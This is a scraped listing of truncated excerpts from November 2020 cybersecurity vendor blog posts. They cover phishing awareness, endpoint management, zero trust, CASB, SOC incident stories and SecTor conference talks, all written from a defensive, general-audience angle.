2020-11-17 18:14:00 | Phishing awareness and phishing training explained (lien direct) | There is no more effective initial attack vector than phishing. With an ability to reach well-within your organization’s logical perimeter all the way down to an individual user’s Inbox with some form of malicious content, phishing has proven to be a challenge to organizations working to maintain a proper security stance. On top of this, phishing attacks have some pretty impressive accolades: Phishing scams focused on Business Email Compromise are the initial attack vector in 60% of cyber insurance claims 61% of successful phishing attacks have resulted in compromised credentials Phishing accounts for losses of $17,700 per minute The exponential growth seen this year with phishing attacks and their success is extremely dangerous when combined with operational shifts to users working from home, using personal devices and lowering their sense of corporate vigilance as part of trying to find a work/life balance. The use of social engineering techniques such as domain, brand, or user impersonation augment the credibility of phishing scams at a time when the user’s sense of defenses is at an all-time low. The current state of both cyberattacks and lack of cyber-readiness dictates that your organization look to elevate its security stance by making its users more aware of phishing attacks, the methods used, and the repercussions of attack success. What is phishing awareness? First off, it’s important to differentiate phishing awareness from security awareness. Security awareness programs and training seek to create a security culture within an organization – of which, being aware of phishing attacks plays a role. Phishing awareness is more laser-focused in on the what, why, and when of phishing attacks and how to avoid becoming a victim. Common types of phishing attacks Phishing attacks utilize a number of mediums, leveraging common tactics to get potential victims to respond in the desired fashion. Some of the mediums include: Phishing (email) – Most people familiar with phishing instantly think of email as the medium. It’s the easiest method to get the undivided attention of their intended victim en masse using automated tools to hit literally hundreds of thousands to millions of individuals with a single click. Spear Phishing (email) – Attackers intent on targeting certain companies, industries, or even individuals will send out phishing attacks created specifically for that victim. Whaling (email) – Whaling attacks are spear phishing campaigns targeting executives, generally using only social engineering techniques to trick the C-level exec into becoming a victim. Vishing (phone) – Phone calls can be a viable medium to trick individuals into resetting passwords, giving up credit card details, and more. Attackers have gone as far as to use deepfake audio – a technology that allows them to sound like anyone they want, including your CEO – to trick users over the phone. SMiShing (text message) – Similar to email as a means of getting directly to the victim in question, SMiShing uses text messages to direct victims to websites intent on infecting mobile devices, stealing online credentials, or obtaining personal details. | |||
|
2020-11-17 12:00:00 | Raising email security awareness through gamification (lien direct) | October was National Cyber Security Awareness Month which is an excellent opportunity to invest in a modern approach to email security awareness. Most companies and organizations conduct security awareness training annually, during onboarding, and after an adverse event. The effectiveness of periodic training varies greatly and depends on organizational culture and structure, leading to unexpected or undesired results. Organizations should seek to modernize their awareness training and adopt a creative approach to training that addresses these challenges. Gamification is a modern approach that personalizes awareness training by adding creativity to an otherwise mundane activity. One way to think of gamification is by adding game principles, game dynamics, or game logic to a task to encourage participation. By turning learning into a more interactive and fun activity, users and employees are motivated to participate, leading to better-sustained outcomes. Applying gamification to email security training helps individuals and organization change their behaviors when it comes to email security. According to an article in Computer World (July 2014), "Participants in our program were 50% less likely to click on a phishing link and 82% more likely to report a phishing email. "(Patrick Heim, chief trust officer, Salesforce.com). How should organizations start with email security awareness gamification? Start with traditional awareness training and build upon that. Once all email users have been through an initial round of security awareness training, follow up with a contest of sorts. For example, reward users that report phishing emails correctly. To create a broad behavioral change, publicize the contest winner's names and rewards. Rewards and positive reinforcement encourages the reporting of phishing emails. Thus, building momentum in email users to participate in the game. This contest is considered the first step into the gamification experience. This initial step highlights the effectiveness of traditional security awareness training. During this phase, collect metrics to measure the buy-in of users and other stakeholders. Next, we want to increase the users' understanding of phishing emails. Think of this phase as the gameplay aspect of gamification. All games need the following components: a goal or objective (definition of what is winning), rules of the game, and scoring. Wining creates motivation to continue to play the game (positive reinforcement). Rules help the players understand how to play and progress through the game. Scoring shows the participants their achievements and how well they are doing. In email security awareness, we use phishing simulations to test users' understanding of a malicious email's type and content. In the gamification version of these simulations, we score the details that users identify as malicious. We call this game "Catch the Phish" and work through different levels of difficulty. The first round contains blatantly obvious misspellings, email addresses, and content. In each subsequent round, the clues become less obvious to the point where they are very subtle. To create positive momentum, publicize users' accomplishments on a leaderboard of sorts, either on the company's intranet or in a periodic newsletter, or any other company-wide medium. Other options within the spirit of gaming are to create inter-departmental or cross-department competitions—for Example, IT vs. Finance, HR vs. Legal, and so on. There are many creative ways to make email security awareness training an engaging, fun activity that increases users' participation and measurably enhances an organization' | Guideline | ||
|
2020-11-17 06:01:00 | What is unified endpoint management? UEM explained (lien direct) | This blog was written by a third party author. The business world is undergoing its most dramatic shift yet with the adoption of digital assets and workforce decentralization representing a huge business opportunity. These changes have led to added endpoints, or devices connecting to the network, and is enabling this transformation. But managing the volumes of these diverse endpoints and geographic locations has grown in complexity. Furthermore, along with these changes in technology adoption and distribution of the workforce, the cybersecurity landscape is also changing. The multitude of endpoints that connect to the network is expanding the attack surface that bad actors with malicious intent can attempt to exploit. From a cybersecurity perspective, this influx of endpoints represents a significant business risk. Organizations need to understand the importance of both managing and securing their endpoints and how these two variables are intertwined for a complete endpoint security strategy. What is UEM? Traditional mobile device management has evolved, and in some way, UEM represents this modern evolution. With the dramatic increase of remote connectivity via mobile devices, shift to work from home, and IoT adoption, unified endpoint management has become the solution for modern IT departments looking to secure these environments. Unified endpoint management is more than just managing endpoints. The “unified” represents one console for deploying, managing, and helping to secure corporate endpoints and applications. In addition, UEM offers the abilities for provisioning, detection, deployment, troubleshooting and updating. UEM software gives IT and security departments the visibility and control over their devices as well as their end-users, delivered through a centralized management console. The goal of UEM software is to simplify an organization's endpoint strategy. But when adopting UEM software, it’s critical to approach the implementation with a big-picture view and plan accordingly. UEM security benefits Unified endpoint management offers organizations many benefits, with the most appealing being reduced costs across multiple departments. By comprehensively automating many IT tasks and processing, UEM often lowers overhead costs and hardware expenditures. Other key benefits are as follows: Offers endpoint management integration with multiple platforms One of the major selling points of UEM software is its ability to integrate with a variety of platforms, including Windows 10, macOS, Linux, Chrome OS, iOS, and Android, among others. With UEM, your business can configure, control, and monitor devices on these platforms from a single management console. With this integration, the burden of connecting these systems is reduced, costs are lowered, and risks are mitigated. Provides data and app protection across the attack surface UEM protects corporate data and applications, reducing cybersecurity threats. This protection is accomplished by: Providing conditional user access Enforcing automated rules Enforcing compliance guidelines Providing safeguards for data loss Empowering IT administrators to identify jailbreaks and OS rooting on devices And, when combined with a Mobile Threat Defense (MTD) solution, UEM’s can enforce security policies and take automated remediation steps to further mitigate security risks for iOS and Android devices. Boasts advanced desktop management With UEM, desktop operating systems gain a digital transformation boost that simplifies deployment and helps optimize app delivery and patch automation. Plus, an endpoint’s data and apps can be | Tool Vulnerability Threat Patching | ||
|
2020-11-16 12:00:00 | Stories from the SOC – Multi-layered defense detects Windows Trojan (lien direct) |
Stories from the SOC is a blog series that describes recent real-world security incident Investigations conducted and reported by the AT&T SOC analyst team for AT&T Managed Threat Detection and Response customers.
Executive summary
Malware infections are common and are often missed by antivirus software. Their impact to critical infrastructure and applications can be devastating to an organization's network, brand and customers if not remediated. With the everchanging nature of cyberattacks, organizations need a layered security strategy. They shouldn’t depend solely on a single layer of security to keep them protected. A multi-layered approach can help to provide anything that slips through the cracks is caught before it effects their business.
The AT&T Managed Threat Detection and Response (MTDR) analyst team received an alarm indicating detection of a potentially malicious executable on a customer's SQL server that was presented as mitigated by their antivirus software. Despite the mitigated status, the team completed more analysis and discovered a history of similar events on the host. Based on the review of the server's event history, the team determined the threat was not mitigated and engaged the customer for remediation. MTDR served as the second layer of defense for this customer, quickly detecting a threat that slipped through the cracks before any damage was done.
Investigation
Initial Alarm Review
Indicators of Compromise (IOC)
The initial alarm surfaced as the result of multiple events indicating that malware had been detected, removed, and no longer posed a threat to our customer's SQL server.
Expanded Investigation
Alarm Detail
Malware infection alarms are common, but anti-malware software ordinarily attends to malicious files effectively, not requiring any further action. Upon review of the server's alarm and event history, the team found that similar ‘Malware Detected' alarms were observed days before. The older alarms were isolated, first-time occurrences and were successfully mitigated by the security controls the customer had in place. These alarms were closed as auto-mitigated.
Response
Building the Investigation
Reviewing instances of this nature should be considered standard practice. A detailed history of the involved asset or of others affected by similar malware usually serve as indicators of a persisting malware infection.
Armed with historical context, we concluded this was likely a persisting malware infection affecting this server. All of the identified files, alarms, and events were gathered into an Investigation and presented to the customer with a recommendation to perform extensive scans on the asset at their earliest convenience.
Customer Interaction
The customer began their investigation shortly following the creation of the Investigation and the notification from our team. They confirmed the server had been compromised and were able to remediate the infection soon after.
This incident serves as a reminder on why centralized logging and threat detection is important; the server's detailed history allowed us to conclude that there was a compromise despite anti-malware logs stating no further actions were required for mitigation |
Malware Threat | ||
|
2020-11-12 12:00:00 | Online purchase scams spike since the start of COVID-19, reports BBB (lien direct) | This blog was written by an independent guest blogger. Scams occurring during online purchases have spiked since the start of the pandemic, as reported in new research conducted by the Better Business Bureau (BBB). Around 80.5% of consumers who reported this type of scam this year lost money, compared to 71.2% in 2015. Online purchasers scams have been among the three riskiest scams for the past three years but the situation has become significantly more severe in 2020. Whether you are a consumer or an online seller, what are the biggest issues you may have to face in terms of purchase scams and what steps can you take to avoid them? The 2020 online purchase scams report The BBB’s new online scams report has found that the number one way consumers were enticed into a scam, was via attractive sales prices. With the job market down and nearly 17 million people in the U.S. having filed initial claims for unemployment insurance at the outset of the virus, indications are already in that the unemployment rate is greater than it was during the pinnacle of the Great Recession. Scammers are therefore taking advantage of the precarious situation of many to entice them with what seems like an irresistible offer. Scammers and availability Another way in which scammers are flourishing is by offering unavailable items. In March and April, many consumers found it difficult to access items like face masks, sanitizing gel, alcohol, and other protective items. The study showed that over half of all consumers who were scammed were unaware of the fact until they found that the items they had ordered were not being received. The platforms these products appeared on were varied and included direct merchant websites, Instagram and Facebook, Google, and other ads that appeared while they were browsing other sites. Online stores are also fighting higher levels of fraud and merchant scams Interestingly, it isn’t only consumers that are being scammed; so too are sellers who have made the switch to online sales, unwittingly falling for merchant account schemes that have resulted in significant loss. There are many ways that sellers have been ‘taken for a ride.' These include purchasing merchant services from companies that have hidden fees. Usually, the seller is enticed by attractive rates for services, unwittingly signing on to contracts that then expose them to charges that have not been previously disclosed. In some cases, identity theft is involved, with devastating repercussions for sellers who have provided information such as bank account numbers, credit card numbers, and the like. Companies wishing to avoid being scammed should deal only with reputable providers. They should be wary of discounts and other promises that appear too good to be true. How Can Online Buyers Avoid Being Scammed? For online buyers, scam prevention involves a number of steps. The first is knowing the different risk groups. The BBB study indicates that although those aged 35-44 are most likely to be scammed (and younger buyers are at a higher risk than older ones), it is actually older purchasers who are likely to lose the largest amounts of money. Buyers should also be aware of typical scams (these can involve romance, | |||
|
2020-11-11 12:00:00 | The Netflix streaming model can obviate your employee\'s computer security (lien direct) | This blog was written by an independent guest blogger. Someone you don’t know walks into your office and sits down at a computer. Maybe that computer is a corporate desktop assigned to a mid-level manager or to a member of your IT department. Maybe it’s a personally owned laptop used by a contractor. That unknown person plugs a USB dongle into that computer, installs some software (typing in the correct password, if requested), runs that software, and walks away. No problem, right? Of course, that’s a problem. Yet that’s what happens every minute of every hour of every day when your workers use the Internet. Every animation from a Web-based business application is, in fact, software that’s downloaded and executed on that laptop or desktop. Each advertising network installs and runs software on the local computer. Every browser plug-in is actually software that runs locally. Some of those foreign applications are benign, harmless, maybe beneficial. Yet those apps can also dig deep into the end-user’s computer, perhaps accessing the file system and your intellectual property. Or maybe installing malware that can capture user identity information, including passwords and administrative credentials that an attacker can use to access network-based resources — and then launch a ransomware attack that can cripple your servers and cost your business millions. Remember, when your employees access cloud-based applications, such as ERP or CRM, everything is being delivered right to the desktop… where, potentially, an attacker might see what’s going on. The Internet has become vital for delivering the things your business needs, like Microsoft Office 365™, Google G-Suite™, Slack™, Salesforce™, NetSuite™, or Workday™. But it also subjects your office computers with risks due to device vulnerabilities, browser flaws, network interception, uncontrolled data access, or corruption of third-party websites via advertising networks or other malicious code. So, of course you’re not letting some unknown person sit down and access an employee’s endpoint device in person. That’s Cybersecurity 101. But in reality, your employees and contractors are inviting and authorizing foreign attacks by using a Web browser -- any Web browser – and when the malware is installed, nobody even knows. You can’t rely on anti-virus, firewalls, intrusion detection/prevention systems, or deep packet inspection to catch that malware because it came in via a trusted browser app. To reiterate: Every time your users open a browser and load a web page, they execute third-party code on your computers and internal resources. That’s a wide-open door for every attacker and every exploit they can think of. What can you do? Stream. Let me try an analogy. Remember when you got VHS tapes from your local Blockbuster™, or DVDs by mail from Netflix™? You brought the media home and ran it on your local endpoint device – that is, your VHS or DVD player. We don’t do that anymore; we stream instead. We can see the proliferation of streaming video, not only with Netflix, but with Hulu™, Disney+™, HBO™, Amazon Prime™, CBS All-Access™, and more. Streaming movie services don’t actually send the movie to your big-screen TV. Instead, they send an image of the movie, frame by frame, custom-formatted to your endpoint specifications. If you can handle 4K, they send 4K frames. If your TV is 1080p, they send 1080p frames. Easy. To summarize that, you are watching a stream of pictures playing in real time, which are sent by the movie service to be displayed on your TV. The only software involved is the secure Netflix or Hulu app running on your smart TV or set-top box. Let’s bring that streaming model into the business computing rea | Ransomware Malware | ||
|
2020-11-10 12:00:00 | Protecting remote endpoints (lien direct) |
Although businesses have been tasked with addressing a number of remote assets associated with off-site resources such as a sales force that’s often mobile, the number of remote endpoints has grown exponentially. The laptops and mobile devices needed to facilitate working from home full-time for a large percentage of their workers given recent global events has exploded. Companies across all spectrums are challenged with establishing and maintaining an appropriate security posture holistically across their entire Information Technology environment.
While one recent primary driver for this increase in the remote workforce may be the current pandemic, at least one recent study suggests that 67% of organizations who responded expect that work from home (WFH) policies which have been implemented in response to the pandemic will remain in place either long-term or perhaps permanently. As such, it’s imperative that organizations not only address these issues in the short-term, but also incorporate practices to provide acceptable remote endpoint security postures in their strategic governance plans moving forward with the expectation that this is the new normal.
Endpoint security is often divided into three (3) distinct phases with specific goals and actions present within each phase. The phases are:
An effective endpoint security program will address all three phases. This blog post will focus on the first phase and how to address them utilizing AT&T’s Managed Vulnerability Program and the solutions we offer. Please note that this is in no way meant to classify the Prevention phase as the most / more important than the other two endpoint protection phases. Future blog posts will expand on this to address the other two phases of endpoint security and together will collectively address this issue in its entirety.
Prevention
Prevention is a pre-attack phase that focuses on thwarting the exploitation of security weaknesses. Activities include establishing and maintaining accurate and up-to-date hardware / software inventories, as well as providing that the inventoried assets have highly secure configurations and all relevant patches applied. The high-level activities making up this phase are illustrated below:
In essence, these activities are often the foundation of all Vulnerability and Patch Management Programs.
Asset inventories
By executing periodic discovery scans using scan engines supplied with vulnerability management solutions, organizations are able to maintain accurate and up-to-date asset inventories. In addition, the solutions that include the ability to deploy passive scan engines are especially helpful in maintaining an asset inventory given their ability to constantly monitor network traffic and alert in near real-time as they identify unknown assets on a network. Note that while passive scan engines are helpful, they’re not a requirement in maintaining effective asset inventories. By executing regular discovery scans on an aggressive cadence, a similar result can be achieved with active scan engines alone. Keep in mind that by comparing discovery scans, or utilizing alerts generated by passive scan engines, businesses can also use this activity to help identify any rogue devices that may be present within an environment.
This is not only a best practice that all organizations should implement, inventories and rogue device detection are a requirement included within many common security frameworks and compliance mandates (i.e. PCI DSS 2.4, CIS control 1 for inventories and PCI DSS 11.1 and CIS control 15 for rogue wireless device |
Vulnerability Threat | ||
|
2020-11-09 12:00:00 | SecTor 2020, Canada\'s Biggest Cybersecurity Event: Day Two (lien direct) |
This blog was written by an independent guest blogger.
Even though SecTor had to be entirely online this year due to our unusual international circumstances, there have been plenty of excellent talks from many experienced cybersecurity professionals. The talks took place over the course of two days, October 21st and 22nd. Last time I covered the talks I attended on day one. Interestingly enough, the talks all had to do with threat detection and analysis. Maybe that’s just what I’m fixated on these days.
The talks I attended on the second day all covered matters businesses must be aware of these days and well into the future. On day two, I learned a lot about how to talk to non-technical executives about security, the unique challenges of cloud security, and the legal implications of cyber threats. Enjoy!
How to Talk to the Board About Cybersecurity
The first talk I attended on the second day was presented by Jeff Costlow, a CISO with nearly 25 years of industry experience. This is the description of the talk from SecTor’s web app:
“With the sudden shift of the global workforce from in-office to remote, IT teams quickly transformed their operations to accommodate the new realities of business — including large-scale adoption of work-from-home technologies, heightened activity on customer-facing networks, and greater use of online services. While these examples of agility allowed business to continue, they also greatly increased the risk of misconfigurations and cyberthreats. Now, it’s looking like they could be here to stay for a while. On top of that, bad actors have wasted no time trying to exploit new vulnerabilities. In the past several weeks, we’ve seen ransomware attacks affect several major organizations. These attacks come on the tail of a surge of attacks across the board brought on during the pandemic, as hackers scanned and took advantage of new workloads, and vulnerable VPN connections and misconfigurations left the gates to the network open.
When attacks like these make headlines, panicked board members have one question for CISOs: how can we be sure that won’t happen to us? Drawing from nearly 25 years of experience in the security industry, Jeff Costlow, CISO at ExtraHop, will share his top strategies for CISOs to lead board-level conversations about risk management amidst the stark new realities of IT.”
When risk enters an organization through devices that the IT department cannot control, securing a network becomes very difficult. Any devices and applications that connect to the network that administrators can’t administrate are considered to be “shadow IT.” This is often a consequence of bring-your-own-device habits, but not always.
Costlow discussed the implications of shadow IT:
“All you have to do is Google or use the search engine of your choice. Search ‘shadow IT horror stories,’ and you will find a ton of these. There is the laptop that runs underneath someone's desk. It turns out it's a business critical piece of software that everyone's using, and it's just running on a laptop under a desk somewhere.
There are also plenty of stories. These are some of my favorites the ones about somebody just wanted to get their job done. And so they started forwarding all their business email to their Google account or their Yahoo account or something like that. Or maybe a personal Dropbox use. One of my favorites is unapproved chat clients. Or an even worse, operating those chat rooms. This is sometimes called ChatOps. We're inside a chat r |
Ransomware Vulnerability Threat Guideline | Yahoo | |
|
2020-11-09 06:01:00 | What is a virtual CISO? (lien direct) | This blog was written by a third party author. Organization’s today host a wide range of information that, due to its external value to competitors, nation-states, or cybercriminals, needs to be properly protected. The role of a Chief Information Security Officer (CISO) is to establish and maintain the organizational strategy and execution to protect its sensitive and valuable information assets and surrounding technologies. But many organizations, while having data that needs protecting, choose to utilize a virtual CISO (vCISO) to address the needs of the CISO role rather than hire one internally. What is virtual Chief Information Security Officer? The vCISO is a security practitioner who uses the culmination of their years of cybersecurity and industry experience to help organizations with developing and managing the implementation of the organization’s information security program. At a high level, vCISOs help to architect the organization’s security strategy, with some helping to also manage its’ implementation. Internal Security staff may still exist, either reporting to or working with the vCISO and their team to execute an impactful security program. Additionally, the vCISO is usually expected to be able to present the organization’s state of information security to an organization’s board, executive team, auditors, or regulators. vCISOs can provide value to organizations by helping with a number of aspects of the overall information security program, including: Information security planning and management activities Organizational and management structure Initiatives affecting information practices Security risk management activities Evaluation of third parties with access to organizational data Coordination of audits by regulators or customers Why are vCISOs becoming more popular? The idea of a virtual CISO has grown in demand with organizations for a number of reasons: CISOs are in demand – Cybersecurity has moved to the forefront of organizational concern. With the rise in cyberattacks, data breaches, sophistication in attacks, and the focus locked in on an organization’s information, organizations wanting to put a comprehensive set of controls and technologies in place need a CISO. A vCISO allows organization to quickly fill a vCISO role, without needing to go through the hiring process. CISOs are expensive – According to salary.com, the average CISO costs over $200,000 a year. While nearly every organization needs a CISO, not every one of them can afford one. A vCISO allows organizations to avoid the expense of employing one in-house full-time, only paying for the services and time used. vCISOs can be more experienced – A vCISO has implemented information security programs for many clients in a diverse set of industries and sizes, giving them a broad range of expertise that can be applied to your organization. vCISOs can be anywhere – Rather than needing to hire someone locally (which limits your options) or need to help pay for a candidate to move, the vCISO works as a consultant, working from just about anywhere, giving the organization exposure to more potential candidates. vCISOs are a consumption-based option – While not every vCISO works the same, this is a contractor who will perform the tasks based on an agreed upon scope of work. So, you’re paying for the services you want from them. Use Cases for a vCISO The choice of a vCISO versus a full-time CISO may still be unclear. So, allow me to provide a list of a few possible use cases for when a vCISO m | |||
|
2020-11-05 12:00:00 | Best data security practices when offboarding employees (lien direct) | This blog was written by an independent guest blogger. In times long gone, disgruntled former employees could only do so much damage to your company, and relatively little at all to your data security. In the fast-moving world of the 21st century, however, it’s a different story. Costly data breaches and devastating thefts have been undertaken in recent years by dissatisfied staff members released from their job duties. In fact, major data breaches caused by angry ex-employees even prompted an FBI report on the matter, with the risks posed by former staff members on an incline which has left CEOs feeling worried, vulnerable, and searching for reliable solutions. Make no mistake, offboarding employees is currently a situation which presents a considerable data security risk. If you’re wondering what to do when it comes to releasing a staff member who has access to sensitive material, or are concerned that former staff members still have access to your data, you’re far from alone. In this article, we’re going to look at the nature of this major issue, as well as presenting some essential best practices for avoiding the potential catastrophes this situation can create. Offboarding employees: Where does the data security risk lie? Most of us are aware of the risks associated with hackers and bad agents from the outside trying to access your data. We’re familiar with best practices for password security, and how to avoid the kind of common pitfalls that come with handling sensitive data on a daily basis. With the rise of pandemic-inspired remote work, a major data exposure risk now comes from improper vetting of outsourced hires. This used to be a smaller problem, but as outsourcing has increased exponentially, so has the potential to suffer a breach from the “outside” inside workforce. Dealing with these employees turned threats (or at least potential threats) who still possess passcodes, knowledge, and have recently added the potential motive to do harm is a scenario most companies find themselves relatively unprepared to deal with. The greatest risk? Quite simply, the loss or theft of the most sensitive corporate data stored in your systems. Dissatisfied or angry ex-employees often have the motivation to steal this kind of data and use it to blackmail your organization or sell it to the highest bidder on the Dark Web. If you think this would never happen in your company, think again. A Cyber-Ark survey found that no less than 88% of IT employees would consider stealing sensitive data if they were fired - which should be a worrying statistic to business owners and managers who care about data security! All of this makes one thing abundantly clear. An effective, thorough, and formal offboarding process is essential for avoiding this eventuality. Studies have shown that nearly 90% of employees are | Threat Studies Guideline | ||
|
2020-11-05 06:01:00 | What is a Cloud Access Security Broker? CASB explained (lien direct) | This blog was written by a third party author. What is a Cloud Access Security Broker (CASB)? A common component of modern cybersecurity infrastructure, a cloud access security broker (CASB) is technology that provides monitoring and mitigates risks from employee use of cloud services. CASBs were initially developed to fill a gap in cloud security visibility left behind by traditional firewalls, next-generation firewalls, and early secure web gateways, which struggled to identify instances of the unapproved use of cloud services, otherwise known as shadow IT or rogue IT. Since then, CASB has evolved into a fully featured cloud governance control that can both monitor and manage which cloud services employees use and how they use them, whether they're connecting from the corporate network or remotely. According to Gartner, in spite of slowing spending growth across the security industry, organizations have bolstered their CASB spending by 33% in 2020 as the category "has entered the mainstream," posting the largest increase of any information security market. The benefits CASB provides Industry experts say that the features and benefits of CASB tend to cluster around four major areas: visibility, compliance, data security, and threat protection. These are what Gartner analysts first coined as the four pillars of CASB. Visibility CASB provides insight, alerting, and reporting into inbound and outbound cloud activity. This includes visibility into which cloud services are being used, who is using them, what content is being sent and stored in the cloud, and whether security policies are being followed in the process. Compliance Beyond basic behavioral visibility, CASB gives risk and compliance personnel granular reporting that makes it possible to track how regulated data is stored across various cloud services. The level of detail makes it easier to prove to auditors whether cloud data handling and encryption practices for personally identifiable information (PII) meet compliance requirements for regulations like PCI DSS and HIPAA. Data security Reporting is just one component of the data privacy and security role that CASB plays. It can also enforce a range of data security policies. This includes access control based on contextual variables like role, device type, device protection status, geography, and more. CASB can extend data loss prevention (DLP) controls across the cloud and restrict sharing of certain classes of data across all cloud stores or certain providers. In addition, CASB can be configured to enforce encryption or tokenization practices and support enhanced authentication practices and integration with technology like single sign on (SSO) and identity and access management (IAM) platforms. Threat protection CASB provides controls and integration with other security products to protect organizational data from both insiders and external threats. A key part of this is behavioral-based activity monitoring to block and alert suspicious activity that could indicate negligent or malicious insiders or potentially compromised accounts. Additionally, many CASBs can analyze for and block malware in cloud resources. Where can a CASB be deployed? CASB deployments can vary greatly, with the category offering a range of possibilities for monitoring and enforcement usage from: Inside the network Remote work connections Cloud-to-cloud connections Visibility and controls are applie | Malware Threat | ||
|
2020-11-04 12:00:00 | In Zero we trust (lien direct) | This blog was written by an independent guest blogger. The network is rapidly changing – What was once known as the ‘perimeter’ that comprised of a crunchy solid exterior with a soft chewy center consisting of endpoints has eroded into a mush of mobile devices, BYOD, IOT and hybrid cloud. Corporate applications and data are moving from on-premise to hybrid and cloud environments increasing cloud workloads by the day and enterprises want to give their staff the ability to access data anytime, anywhere - The location of applications, users, and their devices (which are sometimes unmanaged) are no longer static. Traditional perimeter security methods have done little to stem the flow of today’s cyber-attack reality and this is where Zero Trust Architecture (ZTA) comes to the rescue! ‘Zero Trust’ was first introduced by Forrester Research and considers ‘inherent trust’ as a critical vulnerability. The strapline for Zero Trust is ‘never trust always verify’- everything from the user’s identity to the application’s hosting posture is used provide least privileged access- even after authentication and authorisation in many cases. The National Institute of Standards and Technology (NIST) approach for Zero Trust, focused on 8 principles have been listed below: 1. All data sources and computing services are considered resources. 2. All communication is secured regardless of network location. 3. Access to individual enterprise resources is granted on a per-session basis. 4. Access to resources is determined by dynamic policy—including the observable state of client identity, application, and the requesting asset—and may include other behavioral attributes. 5. The enterprise ensures that all owned and associated devices are in the most secure state possible and monitors assets to ensure that they remain in the most secure state possible. 6. All resource authentication and authorization are dynamic and strictly enforced before access is allowed. 7. The enterprise collects as much information as possible about the current state of network infrastructure and communications and uses it to improve its security posture. Some of the key benefits of ZTA include: Helps reduce the risk of a breach Enhances visibility by discovering and classifying devices on network to discover and classify all devices on the network Supports regulation and compliance activities Greater control over cloud environments Enables digital transformation initiatives While there are many benefits of implementing ZTA, it is by no means straight forward to achieve and there are a few factors for any business to consider before embarking on a ZTA journey. Some of these factors are listed below - ZTA is not a product – it does not come in plug & play! ZTA programs can be complex, time consuming and expensive initiatives that need to be tailored to each individual organisations needs. The complex network infrastructures we see in today’s enterprises can present huge challenges if they are not micro perimeter compatible, leading to expensive redesign and testing which are potentially disruptive to business operations. Therefore, there needs to be a serious business case to invest in a ZTA. ZTA Requires Strong Data-Centric Context: In ZTA, verification and access controls are based on the data, not the platform or application. Therefore, enterprises need to identify what users, data and resources are connecting across the organisation. The key challenge is therefore mapping the flows of sensitive and critical data, identifying who needs to have access to it and then segmenting/zoning the network | Guideline | ||
|
2020-11-04 06:01:00 | What is network security? Network security technologies explained (lien direct) | This blog was written by a third party author. The modern-day organization is under constant pressure to remain operational and profitable. Both of these pressures are put to the test by cybercriminals daily, who attempt to infiltrate, compromise, navigate, and ultimately act in a threatening manner that can have negative repercussions to productivity, ability to transact, customer privacy, brand reputation and bottom-line revenue. So, it’s necessary that organizations look to have proper network security in place to address the looming threat of cyberattacks in an effort to maintain and protect the access to and confidentiality of, your organization’s network and data. What is network security? Network security is a combination of people, process, policy, and technology used in in a layered approach to create a network environment that allows for organizational productivity while simultaneously minimizing the ability for misuse by both external and internal threat actors. How is network security implemented? The people, process, and policy previously mentioned are a key part of the implementation of network security. They work together to take the security goals and create various types of security controls that are used to help establish how network security technologies will be implemented. The three most common types of network security controls are: Physical controls – These controls are used to prevent someone from physically gaining access to any of your organization’s network components. Your data center or server room likely has a keycard system to limit access. That’s a great example of a physical control. Security guards, video surveillance, picture IDs, and biometrics are other types of physical controls. Data and access controls – These controls are the process and policy that define how employees can and should act when working with sensitive data, applications, and systems. Password requirements, mobile device usage, and incident response are just a few examples of administrative controls. Technical controls – Acting as a safeguard or countermeasure when interacting with critical parts of your network environment, these controls are typically implemented via network security technologies. The remainder of this article will focus on these technologies. Primary network security technologies A successful layered approach to network security requires a number of technologies be put in place that each attempt to address the problem of malicious attacks from a different perspective. Some of the more common network security technologies include: Secure remote access – Access is the one thing every cybercriminal must have to successfully attack your organization. Access controls limit which users and devices are able to access specific internal or cloud-based resources. Modern implementations of access controls include zero trust network access (which facilitates access to internal and cloud-based resources without logically placing the user or their device on the corporate network), and secure remote access (a mix of technologies that can address endpoint security, authentication, secure remote connections, and elevation of privileges). Firewall – Firewalls sit at the logical perimeter of your organization’s network acting as a network security guard, inspecting inbound and outbound traffic and determining whether to allow or deny it in real-time. Virtual Private Network (VPN) – VPNs encrypt | Threat | ★★★ | |
|
2020-11-02 12:00:00 | SecTor 2020, Canada\'s biggest cybersecurity event: Day one (lien direct) |
This blog was written by an independent guest blogger.
I live in Toronto, so I always try my best to get to SecTor, Canada’s most important cybersecurity event, every October. Most years, SecTor has taken place in the Metro Toronto Convention Centre. But because of the unusual circumstances affecting the world in 2020, this year the event took place online exclusively. SecTor organizers hope that conditions improve by October 2021 so they can resume hosting the event in-person. I admit I do miss the parties with delicious catering, and seeing people in our industry offline.
But the talks this year have lived up to the excellent standards set by talks in previous years. This year, the main event took place on Wednesday, October 21st, and Thursday, October 22nd. There was so much to cover, even though it was impossible for me to attend all of the talks. First, I’ll start with the talks I attended on day one. Interestingly enough, they all have to do with threat detection and analysis. Enjoy!
Threat Hunting Intelligently
The first talk I attended was titled “Threat Hunting Intelligently.” It was presented by Ryan Cobb, Senior Information Security Researcher at Secureworks.
Here’s the description of the talk, from SecTor’s web app:
“Although times are unprecedented, for threat actors, it is business as usual. Even as times change, good threat intelligence will always be a bedrock of cybersecurity. Join Senior Security Research Consultant and Secureworks’ Threat Hunting lead Ryan Cobb, as he shares what’s on the threat horizon and how the Secureworks team is there to keep customers safe through the intersection of technology, tools, and passionate professionals who provide the ultimate advantage over the adversary. Ryan will present how to combine the insights from threat modeling and intelligence to hunt purposefully and effectively without being limited by what third-party intelligence and strategies can provide for your organization.”
Proper threat hunting procedures can identify indications of compromise (IOCs) efficiently and produce intelligence that can help organizations mitigate a threat before it becomes a huge problem. Improper threat hunting wastes time, money, and effort, and misses data that could be leveraged to improve your organization’s defenses. So I paid close attention to what Cobb had to say. Here is an excerpt from his talk:
“(Threat) modelling is going in and out of vogue over the years has a rich history, especially in Academia. It's a collaborative process where we enumerate threats and prioritize mitigations for them. It's basically a way of looking at your business the technologies that you've chosen and what we know about the threat after from a certain perspective, so we can look at a threat model from the perspective of the after what are the steps. They need to complete to accomplish their goals.
What are the systems we are trying to protect and think about ways those assets to be to be attacked. The outcomes are many threat modeling exercise really should be a prioritized list of hypothetical scenarios and we want to organize them by which are the most plausible to actually occur.
And the steps or other mediations? Hunting is the natural complement to threat modelling, hunting is determining whether some modeled threat actually occurred and went undetected, and hunting is largely focused on collecting and analyzing evidence that supports this hypothesis. So there's a significant overlap between what we do a threat hunting.
The ultimate goal of for hunting is not simply finding the threat in the process of investigating the modeled threat. We are gauging the overal |
Malware Hack Threat Guideline | ||
|
